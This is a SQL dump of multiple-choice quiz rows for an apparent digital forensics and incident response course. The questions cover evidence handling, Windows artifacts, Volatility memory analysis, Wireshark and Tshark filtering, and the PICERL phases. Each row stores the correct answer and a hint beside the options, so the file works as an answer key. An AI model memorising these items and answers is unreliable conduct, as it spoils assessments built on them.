(7124, 793, 'If the Chain of Custody is broken, what is the most likely consequence in a legal proceeding?', 5, 'Inadmissible', 0, 'The evidence cannot be used in court.', '2026-03-09 22:28:54', '[\"Inadmissible\",\"The forensic analyst is fined\",\"The judge must review it personally\",\"The evidence becomes stronger\"]'),
(7125, 794, 'Which forensic principle states that \"Every contact leaves a trace\"?', 1, 'Locards Exchange Principle', 0, 'Named after Dr. Edmond Locard.', '2026-03-09 22:28:54', '[\"Order of Volatility\",\"Locards Exchange Principle\",\"Heisenberg Uncertainty Principle\",\"Principle of Least Privilege\"]'),
(7126, 794, 'According to the Order of Volatility, which should be collected FIRST: the contents of the Hard Drive or the System Memory (RAM)?', 2, 'System Memory', 0, 'It is more volatile than persistent storage.', '2026-03-09 22:28:54', '[\"System Memory\",\"Hard Drive\",\"They should be collected simultaneously\",\"It does not matter\"]'),
(7127, 794, 'If an attacker runs a fileless malware that only exists in active memory, what happens to that malware if you reboot the server?', 3, 'It is destroyed', 0, 'RAM requires power to maintain its data.', '2026-03-09 22:28:54', '[\"It is destroyed\",\"It migrates to the hard drive\",\"It connects to the C2 server\",\"It hides in the boot sector\"]'),
(7128, 794, 'Which is the LEAST volatile source of evidence in the standard order of volatility: RAM, Hard Drive, or Archival Media (Backups)?', 4, 'Archival Media', 0, 'Backups last for years and don\'t change.', '2026-03-09 22:28:54', '[\"RAM\",\"Archival Media\",\"Network Logs\",\"Hard Drive\"]'),
(7129, 794, 'In modern incident response, why is it generally a bad idea to \"pull the power plug\" on a compromised server immediately? (One word related to what you lose)', 5, 'RAM', 0, 'You lose volatile memory.', '2026-03-09 22:28:54', '[\"RAM\",\"Network Logs\",\"Hard Drive\",\"CPU\"]'),
(7130, 795, 'When you first arrive on the scene of a powered-off suspect laptop, what should your immediate first step be?', 1, 'Do not turn it on', 0, 'Booting changes file timestamps.', '2026-03-09 22:28:54', '[\"Do not turn it on\",\"Turn it on to see if it works\",\"Pull the battery out\",\"Attempt to guess the password\"]'),
(7131, 795, 'Why is it dangerous to attempt guessing the password on a locked smartphone or BitLocker-encrypted drive?', 2, 'It may wipe the encryption keys', 0, 'Security features protect the data.', '2026-03-09 22:28:54', '[\"It alerts the attacker\",\"It uses up the battery too fast\",\"It may wipe the encryption keys\",\"It creates unnecessary log files\"]'),
(7132, 795, 'If you find a mobile phone that is suspected to be involved in a crime, what is the best way to prevent the suspect from remotely wiping it?', 3, 'Place it in a Faraday bag', 0, 'Block all radio signals.', '2026-03-09 22:28:54', '[\"Turn it off immediately\",\"Place it in a Faraday bag\",\"Uninstall all apps\",\"Plug it into a charger\"]'),
(7133, 795, 'Why should you avoid using the built-in tools (like Task Manager) on a compromised machine during a live response?', 4, 'They may be compromised by a rootkit', 0, 'You cannot trust the OS anymore.', '2026-03-09 22:28:54', '[\"They do not show network connections\",\"They are not fast enough\",\"They may be compromised by a rootkit\",\"They take up too much RAM\"]'),
(7134, 795, 'What should you do before disconnecting any cables from the back of a suspect\'s computer tower?', 5, 'Take photographs', 0, 'Document the original state.', '2026-03-09 22:28:54', '[\"Check for malware\",\"Wipe the hard drive\",\"Write down the MAC address\",\"Take photographs\"]'),
(7135, 796, 'Which type of acquisition copies only the files visible to the operating system, missing deleted data?', 1, 'Logical', 0, 'It uses the OS logic.', '2026-03-09 22:28:54', '[\"Bit-stream\",\"Physical\",\"Raw\",\"Logical\"]'),
(7136, 796, 'Which type of acquisition reads the raw 1s and 0s directly from the hardware, capturing deleted files in unallocated space?', 2, 'Physical', 0, 'Also known as a bit-stream image.', '2026-03-09 22:28:54', '[\"Volume\",\"Physical\",\"Targeted\",\"Logical\"]'),
(7137, 796, 'What device intercepts commands to prevent a forensic workstation from accidentally altering a suspect\'s hard drive?', 3, 'Write Blocker', 0, 'It blocks write operations.', '2026-03-09 22:28:54', '[\"Write Blocker\",\"Read-Only Memory\",\"Hardware Firewall\",\"Read Blocker\"]'),
(7138, 796, 'Which forensic image format is the industry standard that includes compression, metadata, and built-in hashes?', 4, 'E01', 0, 'Associated with EnCase.', '2026-03-09 22:28:54', '[\"RAW\",\"DD\",\"ISO\",\"E01\"]'),
(7139, 796, 'If you plug a suspect\'s Windows hard drive directly into another Windows machine without protection, what happens to the evidence?', 5, 'It is altered', 0, 'Windows mounts it automatically.', '2026-03-09 22:28:54', '[\"It is altered\",\"Nothing happens\",\"It is encrypted\",\"It copies itself\"]'),
(7140, 797, 'What type of malware executes directly in memory and leaves almost zero trace on the physical hard drive?', 1, 'Fileless Malware', 0, 'It exists without files.', '2026-03-09 22:28:54', '[\"Ransomware\",\"Fileless Malware\",\"Bootkit\",\"Macro Virus\"]'),
(7141, 797, 'Which Windows file contains a perfect snapshot of the RAM contents dumped to the hard drive when the computer goes to sleep?', 2, 'hiberfil.sys', 0, 'Starts with h.', '2026-03-09 22:28:54', '[\"ntuser.dat\",\"pagefile.sys\",\"swapfile.sys\",\"hiberfil.sys\"]'),
(7142, 797, 'What happens to the decryption keys for a BitLocker encrypted drive while the computer is powered on and unlocked?', 3, 'Stored in RAM', 0, 'The system needs them actively.', '2026-03-09 22:28:54', '[\"Sent to the cloud\",\"Stored in RAM\",\"Deleted immediately\",\"Written to the registry\"]'),
(7143, 797, 'Which phenomenon occurs because the contents of RAM change during the time it takes to create a memory image?', 4, 'Smear Effect', 0, 'Like taking a panoramic photo of a moving object.', '2026-03-09 22:28:54', '[\"Bit Flipping\",\"Buffer Overflow\",\"Memory Leak\",\"Smear Effect\"]'),
(7144, 797, 'Which tool is commonly used to extract a full memory dump from a running Linux system?', 5, 'LiME', 0, 'Acronym for Linux Memory Extractor.', '2026-03-09 22:28:54', '[\"DumpIt\",\"FTK Imager\",\"WinPmem\",\"LiME\"]'),
(7145, 798, 'What type of network evidence records the complete payload and headers of every packet sent across the wire?', 1, 'Full Packet Capture', 0, 'Abbreviated as PCAP.', '2026-03-09 22:28:54', '[\"DNS Queries\",\"Full Packet Capture\",\"NetFlow\",\"Firewall Logs\"]'),
(7146, 798, 'What type of network evidence acts like a \"phone bill,\" recording metadata like IPs, ports, and bytes transferred, but NOT the payload?', 2, 'NetFlow', 0, 'Telemetry data.', '2026-03-09 22:28:54', '[\"Syslog\",\"PCAP\",\"NetFlow\",\"SNMP\"]'),
(7147, 798, 'Which hardware device is physically inserted inline with a network cable to passively duplicate traffic for forensic capture?', 3, 'Network Tap', 0, 'It taps into the physical line.', '2026-03-09 22:28:54', '[\"SPAN Port\",\"Network Tap\",\"Router\",\"Network Switch\"]'),
(7148, 798, 'A switch feature that copies traffic from one port to a monitoring port for analysis is called a...?', 4, 'SPAN Port', 0, 'Also known as Port Mirroring.', '2026-03-09 22:28:54', '[\"VLAN\",\"Trunk Port\",\"SPAN Port\",\"VPN\"]'),
(7149, 798, 'If you want to know the exact URL a user clicked on when they fell for a phishing email, which log source is the most useful?', 5, 'Proxy Logs', 0, 'Web gateways track URLs.', '2026-03-09 22:28:54', '[\"Firewall Logs\",\"Proxy Logs\",\"Switch Logs\",\"NetFlow\"]'),
(7150, 799, 'Which physical registry hive file contains the password hashes for local user accounts?', 1, 'SAM', 0, 'Security Account Manager.', '2026-03-09 22:28:54', '[\"SOFTWARE\",\"SAM\",\"SYSTEM\",\"NTUSER.DAT\"]'),
(7151, 799, 'Where is the registry hive file that corresponds to a specific user\'s HKEY_CURRENT_USER (HKCU) located?', 2, 'In their user profile directory', 0, 'It is called NTUSER.DAT.', '2026-03-09 22:28:54', '[\"In their user profile directory\",\"In the Pagefile\",\"C:\\\\Windows\\\\Registry\",\"C:\\\\Windows\\\\System32\\\\config\"]'),
(7152, 799, 'Which registry key tracks the executable programs a user launches from the GUI, keeping count of how many times they were run?', 3, 'UserAssist', 0, 'It assists the user experience.', '2026-03-09 22:28:54', '[\"USBStor\",\"Prefetch\",\"UserAssist\",\"Run\"]'),
(7153, 799, 'What simple encryption method does Windows use to lightly obfuscate the names of programs stored in the UserAssist key?', 4, 'ROT-13', 0, 'A simple letter substitution cipher.', '2026-03-09 22:28:54', '[\"AES-256\",\"Base64\",\"MD5\",\"ROT-13\"]'),
(7154, 799, 'If an attacker wants their malware to survive a system reboot, which category of registry keys are they most likely to modify?', 5, 'Run Keys', 0, 'Keys that auto-start programs.', '2026-03-09 22:28:54', '[\"USBStor\",\"Run Keys\",\"UserAssist\",\"File Associations\"]'),
(7155, 800, 'Which core Windows Event Log tracks successful and failed authentication attempts?', 1, 'Security', 0, 'Only administrators can view it by default.', '2026-03-09 22:28:54', '[\"Setup\",\"System\",\"Security\",\"Application\"]'),
(7156, 800, 'Which Event ID represents a Successful Logon?', 2, '4624', 0, 'Ends in 4.', '2026-03-09 22:28:54', '[\"4625\",\"4720\",\"4624\",\"1102\"]'),
(7157, 800, 'If an attacker uses RDP to remotely access a server, what \"Logon Type\" will be recorded in the Event ID 4624 log?', 3, 'Type 10', 0, 'Remote Interactive logon.', '2026-03-09 22:28:54', '[\"Type 2\",\"Type 7\",\"Type 10\",\"Type 3\"]'),
(7158, 800, 'Which Event ID is generated when a new user account is created on the system?', 4, '4720', 0, 'Account management event.', '2026-03-09 22:28:54', '[\"4720\",\"4672\",\"1102\",\"4688\"]'),
(7159, 800, 'You discover Event ID 1102 in the logs. What action does this explicitly indicate?', 5, 'The logs were cleared', 0, 'A major indicator of anti-forensics.', '2026-03-09 22:28:54', '[\"Malware was installed\",\"The logs were cleared\",\"The system rebooted\",\"A brute force attack succeeded\"]'),
(7160, 801, 'Which Windows feature speeds up application launch times and simultaneously provides forensic analysts with execution counts and timestamps?', 1, 'Prefetch', 0, 'Files ending in .pf.', '2026-03-09 22:28:54', '[\"Amcache\",\"Prefetch\",\"UserAssist\",\"Shimcache\"]'),
(7161, 801, 'Where are Prefetch files stored on a Windows file system?', 2, 'C:\\Windows\\Prefetch', 0, 'Stored in the Windows directory.', '2026-03-09 22:28:54', '[\"They are stored in the Registry\",\"C:\\\\Windows\\\\System32\",\"C:\\\\Users\\\\Public\",\"C:\\\\Windows\\\\Prefetch\"]'),
(7162, 801, 'Which execution artifact is stored as a specific registry key under the SYSTEM hive and is excellent for tracking applications run from removed USB drives?', 3, 'Shimcache', 0, 'Also known as AppCompatCache.', '2026-03-09 22:28:54', '[\"Amcache\",\"Run Keys\",\"Prefetch\",\"Shimcache\"]'),
(7163, 801, 'Which newer execution artifact (Windows 8+) records the actual SHA-1 hash of the executed binary?', 4, 'Amcache', 0, 'Stored as a .hve file.', '2026-03-09 22:28:54', '[\"Prefetch\",\"Shimcache\",\"Event Logs\",\"Amcache\"]'),
(7164, 801, 'True or False: The presence of a file in the Shimcache definitively guarantees that the file was successfully executed by the user.', 5, 'False', 0, 'It can be cached just by exploring the folder.', '2026-03-09 22:28:54', '[\"Only if the file was deleted\",\"False\",\"True\",\"Only on Windows 10\"]'),
(7165, 802, 'What NTFS database file tracks the location and metadata of every single file on the volume?', 1, 'Master File Table', 0, 'Known as $MFT.', '2026-03-09 22:28:54', '[\"Registry\",\"Master Boot Record\",\"Pagefile\",\"Master File Table\"]'),
(7166, 802, 'Which of the MACB timestamps represents the moment a file\'s metadata (like permissions or file name) was altered?', 2, 'MFT Modified', 0, 'The B or fourth timestamp.', '2026-03-09 22:28:54', '[\"Modified\",\"MFT Modified\",\"Created\",\"Accessed\"]'),
(7167, 802, 'What anti-forensics technique involves an attacker deliberately altering the creation or modification timestamps of a file to hide it?', 3, 'Time Stomping', 0, 'Stomping on the MAC times.', '2026-03-09 22:28:54', '[\"Hashing\",\"File Carving\",\"Time Stomping\",\"Steganography\"]'),
(7168, 802, 'Even if a USB drive is removed, which automatically created Windows artifact can reveal the Volume Serial Number of that USB and the original path of the files opened from it?', 4, 'LNK files', 0, 'Shortcut files.', '2026-03-09 22:28:54', '[\"Recycle Bin\",\"Amcache\",\"LNK files\",\"Prefetch\"]'),
(7169, 802, 'When a file is sent to the Windows Recycle Bin, it is split into a $R file (the contents) and an $I file. What information does the $I file contain?', 5, 'Original path and deletion time', 0, 'It holds the metadata of the deletion.', '2026-03-09 22:28:54', '[\"Original path and deletion time\",\"The user password\",\"Decryption keys\",\"The file hash\"]'),
(7170, 803, 'Which open-source framework, written in Python, is considered the industry standard for analyzing RAM dumps?', 1, 'Volatility', 0, 'It analyzes volatile memory.', '2026-03-09 22:28:54', '[\"Wireshark\",\"Autopsy\",\"EnCase\",\"Volatility\"]'),
(7171, 803, 'In Volatility 2, what piece of information must an analyst manually specify so the tool understands how to parse the OS structures?', 2, 'The Profile', 0, 'E.g., Win7SP1x64.', '2026-03-09 22:28:54', '[\"The Password\",\"The Malware Hash\",\"The IP Address\",\"The Profile\"]'),
(7172, 803, 'What command line flag is used in Volatility 3 to specify the input file (the memory image)?', 3, '-f', 0, 'Stands for file.', '2026-03-09 22:28:54', '[\"-p\",\"-i\",\"-m\",\"-f\"]'),
(7173, 803, 'What is the name of a specific script in Volatility that looks for an exact type of artifact (e.g., hidden processes)?', 4, 'Plugin', 0, 'You plug it into the framework.', '2026-03-09 22:28:54', '[\"Add-on\",\"Plugin\",\"Module\",\"Extension\"]'),
(7174, 803, 'Which Volatility 3 plugin should be run first to gather basic OS build information and the exact UTC timestamp of the memory acquisition?', 5, 'windows.info', 0, 'It provides information about the Windows build.', '2026-03-09 22:28:54', '[\"windows.netstat\",\"windows.malfind\",\"windows.info\",\"windows.pslist\"]'),
(7175, 804, 'Which Volatility plugin relies on the OS-maintained linked list (ActiveProcessLinks) to show currently running processes, making it vulnerable to rootkits?', 1, 'windows.pslist', 0, 'It just lists what the OS sees.', '2026-03-09 22:28:54', '[\"windows.pstree\",\"windows.psscan\",\"windows.pslist\",\"windows.malfind\"]'),
(7176, 804, 'What technique does a rootkit use to hide a malicious process from the Task Manager and the pslist command?', 2, 'Direct Kernel Object Manipulation (Unlinking)', 0, 'It alters the ActiveProcessLinks.', '2026-03-09 22:28:54', '[\"Encryption\",\"Direct Kernel Object Manipulation (Unlinking)\",\"Code Injection\",\"Obfuscation\"]'),
(7177, 804, 'Which Volatility plugin ignores the OS list and scans every byte of memory for specific data structures, allowing it to find hidden and recently terminated processes?', 3, 'windows.psscan', 0, 'It scans for signatures.', '2026-03-09 22:28:54', '[\"windows.netscan\",\"windows.pslist\",\"windows.pstree\",\"windows.psscan\"]'),
(7178, 804, 'If you see a process listed in the output of psscan, but that exact same PID is missing from the output of pslist, what is the most likely explanation?', 4, 'The process was deliberately hidden (Rootkit)', 0, 'It was unlinked from the main list.', '2026-03-09 22:28:54', '[\"The process crashed\",\"The process requires administrator rights\",\"Volatility has a bug\",\"The process was deliberately hidden (Rootkit)\"]'),
(7179, 804, 'Which plugin is best for spotting anomalies like Microsoft Word spawning a Command Prompt by visualizing parent-child process relationships?', 5, 'windows.pstree', 0, 'Shows the family tree.', '2026-03-09 22:28:54', '[\"windows.pslist\",\"windows.psscan\",\"windows.pstree\",\"windows.info\"]'),
(7180, 805, 'Which Volatility plugin is used to find active, listening, and recently closed network connections within a memory image?', 1, 'windows.netscan', 0, 'Scans for network artifacts.', '2026-03-09 22:28:54', '[\"windows.psscan\",\"windows.netstat\",\"windows.cmdline\",\"windows.netscan\"]'),
(7181, 805, 'If you find a suspicious external IP address using windows.netscan, what field in the output tells you exactly which program on the computer opened the connection?', 2, 'Owner (PID)', 0, 'The Process ID involved.', '2026-03-09 22:28:54', '[\"Protocol\",\"State\",\"Local Port\",\"Owner (PID)\"]'),
(7182, 805, 'Which plugin displays the exact arguments and flags that were passed to an executable when it was launched?', 3, 'windows.cmdline', 0, 'Command Line.', '2026-03-09 22:28:54', '[\"windows.psscan\",\"windows.pslist\",\"windows.cmdline\",\"windows.info\"]'),
(7183, 805, 'An attacker launches PowerShell with the `-e` flag followed by a long string of random-looking characters. What encryption/encoding method is this primarily indicating?', 4, 'Base64', 0, 'Powershell EncodedCommand uses this.', '2026-03-09 22:28:54', '[\"MD5\",\"Base64\",\"ROT-13\",\"AES\"]'),
(7184, 805, 'Using built-in, legitimate IT administrator tools (like certutil or powershell) to download malware and avoid antivirus detection is known as what kind of attack?', 5, 'Living off the Land (LotL)', 0, 'Using what is already there.', '2026-03-09 22:28:54', '[\"Ransomware\",\"Zero-Day Exploit\",\"Buffer Overflow\",\"Living off the Land (LotL)\"]'),
(7185, 806, 'What technique does an attacker use to hide malicious, executing code inside the memory space of a legitimate Windows process (like explorer.exe)?', 1, 'Code Injection', 0, 'Injecting into another process.', '2026-03-09 22:28:54', '[\"Time Stomping\",\"Port Knocking\",\"Code Injection\",\"Phishing\"]'),
(7186, 806, 'In Windows memory protection rules (VAD), which permission state is considered highly dangerous and indicative of malicious injection?', 2, 'PAGE_EXECUTE_READWRITE (RWX)', 0, 'It allows writing and running code simultaneously.', '2026-03-09 22:28:54', '[\"PAGE_EXECUTE_READWRITE (RWX)\",\"PAGE_EXECUTE\",\"PAGE_READWRITE\",\"PAGE_READONLY\"]'),
(7187, 806, 'Which Volatility plugin is specifically designed to hunt for code injection by scanning all processes for hidden RWX memory regions?', 3, 'windows.malfind', 0, 'Finds malware.', '2026-03-09 22:28:54', '[\"windows.netscan\",\"windows.malfind\",\"windows.psscan\",\"windows.pslist\"]'),
(7188, 806, 'When viewing the hex dump output of malfind, what two bytes (in hex) represent the \"magic bytes\" header of a Windows Executable file?', 4, '4D 5A', 0, 'Translates to ASCII MZ.', '2026-03-09 22:28:54', '[\"4D 5A\",\"50 4B\",\"FF D8\",\"89 50\"]'),
(7189, 806, 'Once you have identified the PID of an injected process using malfind, what Volatility flag allows you to extract the malicious code out of the RAM image and save it to your hard drive?', 5, '--dump', 0, 'Dumps the file.', '2026-03-09 22:28:54', '[\"--export\",\"--extract\",\"--save\",\"--dump\"]'),
(7190, 807, 'What is the standard file extension used to store a byte-for-byte recording of entire network packets?', 1, '.pcap', 0, 'Packet Capture.', '2026-03-09 22:28:54', '[\".evt\",\".log\",\".pcap\",\".ps1\"]'),
(7191, 807, 'Which of the following acts like a \"phone bill,\" recording metadata about a connection (who, when, how long) but NOT the actual data payload?', 2, 'NetFlow', 0, 'It records the flow of the network.', '2026-03-09 22:28:54', '[\"PCAP\",\"Syslog\",\"EventTracer\",\"NetFlow\"]'),
(7192, 807, 'To capture all traffic on a network segment, what mode must a network interface card (NIC) be placed into?', 3, 'Promiscuous Mode', 0, 'It reads every packet it sees.', '2026-03-09 22:28:54', '[\"Stealth Mode\",\"Monitor Mode\",\"Promiscuous Mode\",\"Injektion Mode\"]'),
(7193, 807, 'Which popular command-line tool, common on Linux environments, is frequently used to capture packets and write them to a PCAP file?', 4, 'tcpdump', 0, 'Dumps TCP traffic.', '2026-03-09 22:28:54', '[\"tcpdump\",\"ping\",\"netstat\",\"nmap\"]'),
(7194, 807, 'Why is network forensics often considered more reliable than host-based forensics (like checking event logs)?', 5, 'Network sensors are harder for malware to bypass or erase', 0, 'Packets don\'t lie, and they are usually stored off the infected host.', '2026-03-09 22:28:54', '[\"Network sensors are harder for malware to bypass or erase\",\"It is faster to analyze\",\"It uses less disk space\",\"It is encrypted by default\"]'),
(7195, 808, 'In Wireshark\'s three-pane interface, which pane allows you to expand and inspect the specific headers of the OSI model layers (like the IPv4 or TCP headers)?', 1, 'Packet Details (Middle)', 0, 'It breaks down the details.', '2026-03-09 22:28:54', '[\"Packet Bytes (Bottom)\",\"Packet List (Top)\",\"Packet Details (Middle)\",\"Filter Bar\"]'),
(7196, 808, 'What is the exact Wireshark display filter syntax to show only packets where the source IP is 8.8.8.8?', 2, 'ip.src == 8.8.8.8', 0, 'Remember the double equals sign.', '2026-03-09 22:28:54', '[\"source_ip = 8.8.8.8\",\"ip.addr == 8.8.8.8\",\"ip.src == 8.8.8.8\",\"ip:src=8.8.8.8\"]'),
(7197, 808, 'Which display filter would you use to find instances where a user uploaded data or submitted a form to an unencrypted web server?', 3, 'http.request.method == \"POST\"', 0, 'Looking for the HTTP POST method.', '2026-03-09 22:28:54', '[\"ftp.request == \\\"UPLOAD\\\"\",\"http.request.method == \\\"POST\\\"\",\"http.response == 200\",\"tcp.port == 80\"]'),
(7198, 808, 'What powerful Wireshark feature automatically reassembles dozens of fragmented packets into a single, readable conversation window?', 4, 'Follow TCP Stream', 0, 'It follows the entire flow of the stream.', '2026-03-09 22:28:54', '[\"Expert Info\",\"Protocol Hierarchy\",\"Resolve IPs\",\"Follow TCP Stream\"]'),
(7199, 808, 'What does the Boolean operator `&&` do when combining display filters in Wireshark?', 5, 'Logical AND (Both conditions must be true)', 0, 'It restricts the search.', '2026-03-09 22:28:54', '[\"Logical NOT\",\"Logical AND (Both conditions must be true)\",\"Concatenation\",\"Logical OR\"]'),
(7200, 809, 'Which network protocol essentially acts as the \"phonebook of the internet,\" resolving domain names into IP addresses, and operates on UDP port 53?', 1, 'DNS', 0, 'Domain Name System.', '2026-03-09 22:28:54', '[\"HTTP\",\"DNS\",\"FTP\",\"SSH\"]'),
(7201, 809, 'An infected machine generates hundreds of DNS requests per minute for random, nonsensical domains like \"kjxqzwp.info\". What technique is the malware likely using?', 2, 'Domain Generation Algorithm (DGA)', 0, 'It generates domains programmatically.', '2026-03-09 22:28:54', '[\"Fast Fluxing\",\"ARP Spoofing\",\"DNS Tunneling\",\"Domain Generation Algorithm (DGA)\"]'),
(7202, 809, 'In an HTTP request, which key header field indicates the type of browser or client software making the request, and is often a dead giveaway for automated malware scripts?', 3, 'User-Agent', 0, 'Tells the server the \"agent\" of the user.', '2026-03-09 22:28:54', '[\"Referer\",\"Host\",\"User-Agent\",\"Accept-Encoding\"]'),
(7203, 809, 'If you see an HTTP response code of \"200 OK\" immediately following an HTTP GET request for \"malware.exe\", what does this indicate?', 4, 'The malware download was successful', 0, '200 means success.', '2026-03-09 22:28:54', '[\"The server blocked the download\",\"The malware download was successful\",\"The file was not found\",\"The client timed out\"]'),
(7204, 809, 'What Wireshark feature allows you to quickly rebuild and extract files (like images, scripts, or executables) that were transmitted over unencrypted HTTP traffic?', 5, 'File -> Export Objects -> HTTP', 0, 'You export the object from the protocol.', '2026-03-09 22:28:54', '[\"File -> Export Objects -> HTTP\",\"Statistics -> Protocol Hierarchy\",\"Edit -> Reassemble Payload\",\"Analyze -> Decode As\"]'),
(7205, 810, 'What command-line tool provides the exact same parsing capabilities as Wireshark but is vastly superior for analyzing massive PCAP files and scripting?', 1, 'Tshark', 0, 'The terminal version of Wireshark.', '2026-03-09 22:28:54', '[\"Tshark\",\"tcpdump\",\"Zeek\",\"Snort\"]'),
(7206, 810, 'In Tshark, what command line flag is used to apply a Wireshark-style display filter (e.g., to filter for \"http\")?', 2, '-Y', 0, 'Capital Y.', '2026-03-09 22:28:54', '[\"-Y\",\"-f\",\"-d\",\"-R\"]'),
(7207, 810, 'When you want Tshark to output specific columns of data rather than the entire packet summary, what output format flag must you use?', 3, '-T fields', 0, 'Specifies the output format as fields.', '2026-03-09 22:28:54', '[\"-T fields\",\"-T json\",\"-x fields\",\"-o columns\"]'),
(7208, 810, 'Which flag is used in conjunction with \"-T fields\" to actually specify the name of the specific field you want to extract (e.g., ip.src)?', 4, '-e', 0, 'Extract this field.', '2026-03-09 22:28:54', '[\"-c\",\"-f\",\"-x\",\"-e\"]'),
(7209, 810, 'Why would an analyst pipe the output of Tshark into the Bash commands `sort | uniq -c | sort -nr` ?', 5, 'To count and find the most frequent occurrences (like top talkers)', 0, 'A classic bash one-liner for frequency analysis.', '2026-03-09 22:28:54', '[\"To count and find the most frequent occurrences (like top talkers)\",\"To extract an executable\",\"To safely delete the PCAP\",\"To encrypt the output log\"]'),
(7210, 811, 'What does the acronym PICERL stand for in the context of Incident Response?', 1, 'Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned', 0, 'The 6 phases of IR.', '2026-03-09 22:28:54', '[\"Planning, Incident, Control, Eradicate, Restore, Listen\",\"Proactive, Identification, Correction, Eviction, Recovery, Legal\",\"Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned\",\"Prevention, Investigation, Containment, Evaluation, Recovery, Logging\"]'),
(7211, 811, 'Which phase of the PICERL methodology involves developing standard operating procedures (Playbooks) and conducting tabletop exercises?', 2, 'Preparation', 0, 'Done before the attack.', '2026-03-09 22:28:54', '[\"Lessons Learned\",\"Preparation\",\"Identification\",\"Eradication\"]'),
(7212, 811, 'A firewall blocking a port scan from the internet is considered a routine network ________, whereas an attacker successfully bypassing the firewall and stealing data is a security ________.', 3, 'Event / Incident', 0, 'One is normal, one is a breach of policy.', '2026-03-09 22:28:54', '[\"Log / Disaster\",\"Breach / Alert\",\"Incident / Event\",\"Event / Incident\"]'),
(7213, 811, 'Malicious IP addresses, known bad file hashes, and attacker domain names are collectively referred to as what?', 4, 'Indicators of Compromise (IoCs)', 0, 'Evidence of an attack.', '2026-03-09 22:28:54', '[\"Exploits\",\"Indicators of Compromise (IoCs)\",\"Signatures\",\"Vulnerabilities\"]'),
(7214, 811, 'During the Identification phase, what is the process of determining exactly how many systems an attacker has compromised?', 5, 'Scoping', 0, 'Figuring out how wide the breach is.', '2026-03-09 22:28:54', '[\"Scoping\",\"Eradication\",\"Triaging\",\"Forensics\"]'),
(7215, 812, 'What is the primary objective of the Containment phase in Incident Response?', 1, 'To stop the spread of the attack and prevent further damage', 0, 'Stopping the bleeding.', '2026-03-09 22:28:54', '[\"To identify the attacker\",\"To write the final report\",\"To restore backups\",\"To stop the spread of the attack and prevent further damage\"]'),
(7216, 812, 'Quickly disconnecting an infected server to stop an active data breach is an example of what containment strategy?', 2, 'Immediate Containment', 0, 'Pulling the plug.', '2026-03-09 22:28:54', '[\"Immediate Containment\",\"Delayed Containment\",\"Eradication\",\"Scoping\"]'),
(7217, 812, 'What is the major risk of using the \"Delayed Containment\" strategy (watching the attacker)?', 3, 'The attacker might steal data or deploy ransomware while you are watching', 0, 'It is a high-risk gamble.', '2026-03-09 22:28:54', '[\"You might lose your job\",\"The SIEM might run out of storage\",\"The attacker might steal data or deploy ransomware while you are watching\",\"The firewall will crash\"]'),
(7218, 812, 'Why is \"pulling the power plug\" out of the wall generally considered a bad containment strategy for traditional forensics?', 4, 'It destroys volatile evidence stored in RAM', 0, 'RAM is erased without power.', '2026-03-09 22:28:54', '[\"It causes a power surge\",\"It encrypts the disk\",\"It breaks the hard drive\",\"It destroys volatile evidence stored in RAM\"]'),
(7219, 812, 'Using an EDR agent to logically cut off a compromised laptop\'s access to the internet and internal network, while keeping it powered on for forensics, is called what?', 5, 'Endpoint Isolation', 0, 'Quarantining the endpoint.', '2026-03-09 22:28:54', '[\"Network Segmentation\",\"Sinkholing\",\"Endpoint Isolation\",\"Port Security\"]');
--
-- Quiz questions for tasks 813-825, five per task (question_order 1..5).
-- `options` is a JSON array serialised as text (hence the SQL-escaped quotes);
-- in every row here `correct_answer` matches one of the `options` strings,
-- and `case_sensitive` is 0 throughout.
-- NOTE(review): the answer key sits in the same row as the options. If an API
-- returns these rows to the client, confirm the serializer drops `correct_answer`
-- before the question has been answered.
--
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(7220, 813, 'In the PICERL methodology, which phase involves the actual deletion of malware, removing persistent backdoors, and patching the initial vulnerability?', 1, 'Eradication', 0, 'Removing the root cause.', '2026-03-09 22:28:54', '[\"Identification\",\"Containment\",\"Eradication\",\"Recovery\"]'),
(7221, 813, 'Why is simply deleting a known malicious file often considered an insufficient eradication strategy against advanced attackers?', 2, 'They likely have hidden persistent backdoors elsewhere on the system', 0, 'Whack-a-mole doesn\'t work.', '2026-03-09 22:28:54', '[\"Antivirus will block the deletion\",\"The file will just redownload itself from Microsoft\",\"The file is usually too large\",\"They likely have hidden persistent backdoors elsewhere on the system\"]'),
(7222, 813, 'What is the industry-standard, most secure method for eradicating a severe malware infection from a host?', 3, 'Wiping the hard drive and reinstalling the OS from a clean image', 0, 'When in doubt, wipe it out.', '2026-03-09 22:28:54', '[\"Uninstalling the web browser\",\"Wiping the hard drive and reinstalling the OS from a clean image\",\"Deleting the registry cache\",\"Running three different Antivirus scans\"]'),
(7223, 813, 'During the Recovery phase, what is the primary source used to bring data back online if a server was destroyed by ransomware?', 4, 'Secure, offline backups', 0, 'Data restoration source.', '2026-03-09 22:28:54', '[\"Secure, offline backups\",\"Volume Shadow Copies\",\"Cloud Storage Logs\",\"The Master File Table\"]'),
(7224, 813, 'Immediately after a compromised system is cleaned and placed back onto the production network, what action must the Security Operations Center (SOC) take?', 5, 'Implement enhanced monitoring on that system to ensure the attacker doesn\'t return', 0, 'Watch it closely.', '2026-03-09 22:28:54', '[\"Downgrade the EDR software\",\"Turn off the firewall\",\"Implement enhanced monitoring on that system to ensure the attacker doesn\'t return\",\"Format the hard drive again\"]'),
(7225, 814, 'Which phase of the PICERL methodology is often skipped but is vital for improving organizational security posture against future attacks?', 1, 'Lessons Learned', 0, 'The final phase.', '2026-03-09 22:28:54', '[\"Recovery\",\"Preparation\",\"Lessons Learned\",\"Containment\"]'),
(7226, 814, 'What critical document must the Incident Response team produce shortly after the incident is concluded?', 2, 'The Post-Incident Report', 0, 'Details the timeline and root cause.', '2026-03-09 22:28:54', '[\"The SLA Agreement\",\"The Firewall Ruleset\",\"The Post-Incident Report\",\"The Eradication Statement\"]'),
(7227, 814, 'Determining exactly how the attacker gained initial access to the network (e.g., finding the specific employee who clicked a phishing link) is known as what?', 3, 'Root Cause Analysis', 0, 'Finding \"Patient Zero\".', '2026-03-09 22:28:54', '[\"Root Cause Analysis\",\"Scoping\",\"Triaging\",\"Threat Hunting\"]'),
